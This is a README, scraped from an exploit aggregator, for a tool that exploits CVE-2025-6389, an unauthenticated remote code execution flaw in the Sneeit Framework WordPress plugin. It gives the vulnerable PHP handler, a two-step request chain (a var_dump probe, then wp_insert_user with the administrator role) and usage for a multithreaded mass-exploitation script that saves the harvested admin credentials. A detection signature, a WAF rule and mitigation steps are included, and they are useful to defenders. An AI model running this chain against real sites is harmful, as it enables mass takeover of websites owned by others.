## https://sploitus.com/exploit?id=59160A6E-A25D-5C2D-9849-00B314FADCBE
# CVE-2025-6389
Sneeit Framework <= 8.3 - Unauthenticated Remote Code Execution in sneeit_articles_pagination_callback
```
_______ ________ ___ ___ ___ _____ __ ____ ___ ___
/ ____\ \ / / ____| |__ \ / _ \__ \| ____| / /|___ \ / _ \ / _ \
| | \ \ / /| |__ ______ ) | | | | ) | |__ ______ / /_ __) | (_) | (_) |
| | \ \/ / | __|______/ /| | | |/ /|___ \______| '_ \|__ _
[](https://t.me/KNxploited)
[](https://vulners.com/cve/CVE-2025-6389)
[](https://nvd.nist.gov/vuln/detail/CVE-2025-6389)
[](https://python.org)
[](#%EF%B8%8F-disclaimer)
> ๐ก **Don't miss the next drop.**
> Follow **[@KNxploited](https://t.me/KNxploited)** on Telegram โ the definitive channel for freshly disclosed CVEs, working exploits, and elite security research. First to know. First to act.
---
## ๐ง Overview
**CVE-2025-6389** is a **CVSS 9.8 Critical** Remote Code Execution vulnerability found in the **Sneeit Framework** plugin for WordPress.
The flaw exists in the `sneeit_articles_pagination_callback()` function, which blindly passes **user-supplied input** into PHP's `call_user_func()` โ an unauthenticated attacker can call any PHP function with arbitrary arguments, including `wp_insert_user`, effectively granting themselves **full administrator access** or executing any server-side code.
| Field | Details |
|----------------------|----------------------------------------------|
| **CVE ID** | CVE-2025-6389 |
| **Plugin** | Sneeit Framework (`sneeit-framework`) |
| **Affected Versions**| All versions up to and including **8.3** |
| **Vulnerability Type** | Remote Code Execution (RCE) |
| **Attack Vector** | Network โ No Authentication Required |
| **CVSS 3.1 Score** | **9.8 CRITICAL** |
| **CVSS Vector** | `AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` |
| **CNA** | Wordfence |
| **Impact** | Full server compromise / Admin takeover |
| **Researcher** | Nxploited |
---
## ๐ Vulnerability Deep Dive
The root cause is misuse of PHP's `call_user_func()` in the plugin's AJAX handler:
```php
// Registered without authentication check
add_action('wp_ajax_nopriv_sneeit_articles_pagination', 'sneeit_articles_pagination_callback');
function sneeit_articles_pagination_callback() {
$callback = $_POST['callback']; // โ User-controlled function name
$args = json_decode(stripslashes($_POST['args']), true); // โ User-controlled args
// Calling ANY PHP function with ANY arguments โ zero validation
$result = call_user_func($callback, ...$args);
echo $result;
die();
}
```
**Why this is critical:**
- `wp_ajax_nopriv_*` = accessible by **anyone, no login required**
- `call_user_func($callback, $args)` = arbitrary function invocation
- Attacker can call `var_dump`, `system`, `wp_insert_user`, `eval`, or any PHP/WordPress function
- The response is returned directly โ enabling **blind & verbose RCE**
---
## โ๏ธ Exploit Chain
```
Step 1 โ Probe / Fingerprint
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
POST /wp-admin/admin-ajax.php
action = sneeit_articles_pagination
callback = var_dump
args = ["test"]
Expected Response โ array(1) { [0]=> string(4) "test" }
โ
Confirms: call_user_func() is reachable and reflecting output
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
Step 2 โ Admin Account Creation
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
POST /wp-admin/admin-ajax.php
action = sneeit_articles_pagination
callback = wp_insert_user
args = {"user_login":"Nxploited_XXXX",
"user_pass":"xplpass",
"user_email":"...",
"role":"administrator"}
Result โ New administrator account silently created on target
โ
Full WordPress admin panel access achieved โ๏ธ
```
---
## โ๏ธ Requirements
```bash
pip install requests rich
```
| Dependency | Purpose |
|-------------|-------------------------------------------|
| `requests` | HTTP requests with session/proxy support |
| `rich` | Live terminal dashboard, panels, progress |
| `threading` | Concurrent multi-target processing |
| `queue` | Thread-safe target distribution |
> Python **3.8+** required. Type hints use `tuple[...]` syntax introduced in 3.9+ โ use 3.9+ for best compatibility.
---
## ๐ File Structure
```
CVE-2025-6389/
โโโ CVE-2025-6389.py # Main exploit script
โโโ list.txt # Target URLs โ one per line
โโโ success_results.txt # Auto-generated: successful targets + credentials
โโโ debug_responses/ # Auto-generated: raw server responses for debugging
โโโ .resp.txt
```
---
## ๐ Usage
### Step 1 โ Prepare Targets
Create `list.txt` with one URL per line:
```
https://target1.com
https://target2.com
http://target3.com
```
> URLs without `http://` or `https://` are automatically prefixed with `http://`.
---
### Step 2 โ Run the Exploit
```bash
python CVE-2025-6389.py
```
You will be prompted:
```
Targets file name (default list.txt): list.txt
Number of threads (default 10): 20
```
---
### Step 3 โ Live Dashboard
The script launches a **real-time Rich dashboard** showing:
```
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ [ASCII BANNER] โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโฌโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโค
โ Info โ Stats โ
โ Usage: Put targets in... โ Total Targets: 150 โ
โ Threads: 20 โ Processed: 87 โ
โ Password: xplpass โ Successes: 12 โ
โ Success Log: success... โ Failures: 75 โ
โ Debug Dir: debug_responses โ Elapsed: 00:01:43 โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโดโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโค
โ Recent Results โ
โ Time Target Result โ
โ 14:23:01 https://victim.com SUCCESS โ
โ 14:23:03 https://example.net FAIL โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
```
---
### Step 4 โ Review Results
**Successful exploits** are saved to `success_results.txt`:
```
https://victim.com | USER: Nxploited_4821 | PASS: xplpass | EMAIL: Nxploited_4821@gmail.com
```
**Debug responses** (for failed targets) are saved under `debug_responses/`:
```
debug_responses/
โโโ https___victim.com.resp.txt โ Raw server response for analysis
```
---
## ๐ฅ๏ธ Script Parameters Reference
| Prompt | Default | Description |
|---------------------|---------------------|-----------------------------------------------|
| Targets file | `list.txt` | File containing target URLs |
| Number of threads | `10` (max: `200`) | Concurrent workers โ increase for bulk scans |
| Password | `xplpass` (hardcoded) | Password set for created admin accounts |
| Username format | `Nxploited_XXXX` | Auto-generated with random 4-digit suffix |
---
## ๐ Detection Signature
The exploit generates the following network signature โ useful for defenders and WAF rule authors:
```
POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
action=sneeit_articles_pagination&callback=&args=
```
**WAF / IDS Rule (Pseudocode):**
```
IF request.method == POST
AND request.path == "/wp-admin/admin-ajax.php"
AND request.body CONTAINS "sneeit_articles_pagination"
AND request.body CONTAINS "callback"
THEN BLOCK + ALERT
```
---
## ๐ก๏ธ Mitigation & Remediation
If you are a **site owner, developer, or defender**, take these steps immediately:
- โ **Update** Sneeit Framework to a version **above 8.3** if a patch is available
- โ **Deactivate and delete** the plugin until a patched version is confirmed
- โ **Audit** recently created WordPress admin accounts for unauthorized entries
- โ **Implement** server-side input validation โ never pass user input into `call_user_func()`
- โ **Block** unauthenticated POST requests to `admin-ajax.php` at the WAF/Firewall level
- โ **Monitor** server logs for `sneeit_articles_pagination` AJAX action calls
- โ **Enable** two-factor authentication on all existing admin accounts as a containment measure
---
## โ ๏ธ Disclaimer
```
THIS TOOL IS PROVIDED STRICTLY FOR EDUCATIONAL, AUTHORIZED PENETRATION
TESTING, AND SECURITY RESEARCH PURPOSES ONLY.
By downloading, running, or modifying this script, you explicitly agree:
โข You have EXPLICIT, WRITTEN authorization from the owner of every
system you test. No exceptions.
โข You are operating within a controlled lab environment or during a
formally scoped and authorized engagement.
โข You will NOT deploy this tool against any system, network, or
infrastructure you do not have legal permission to test.
โข Nxploited and all contributors assume ZERO liability for any
unauthorized use, damage, data loss, legal action, or criminal
prosecution arising from the use of this tool.
Unauthorized use of this exploit is a criminal offense under:
โ Computer Fraud and Abuse Act (CFAA), USA
โ Computer Misuse Act (CMA), UK
โ EU Directive 2013/40/EU on Attacks Against Information Systems
โ And all equivalent national and international cybercrime laws.
USE RESPONSIBLY. HACK ETHICALLY. DISCLOSE RESPONSIBLY.
```
---
## ๐ค Author
| | |
|---------------|----------------------------------------------------------------|
| **Handle** | Nxploited (Khaled Alenazi) |
| **Telegram** | [@KNxploited](https://t.me/KNxploited) |
| **GitHub** | [github.com/Nxploited](https://github.com/Nxploited) |
> ๐ **Follow [@KNxploited](https://t.me/KNxploited) on Telegram**
> The channel where real exploits drop first โ CVEs, zero-days, PoCs,
> and deep-dive vulnerability research. Updated regularly. Stay sharp.
---
Crafted with precision by Nxploited ยท For authorized security research only ยท CVSS 9.8 Critical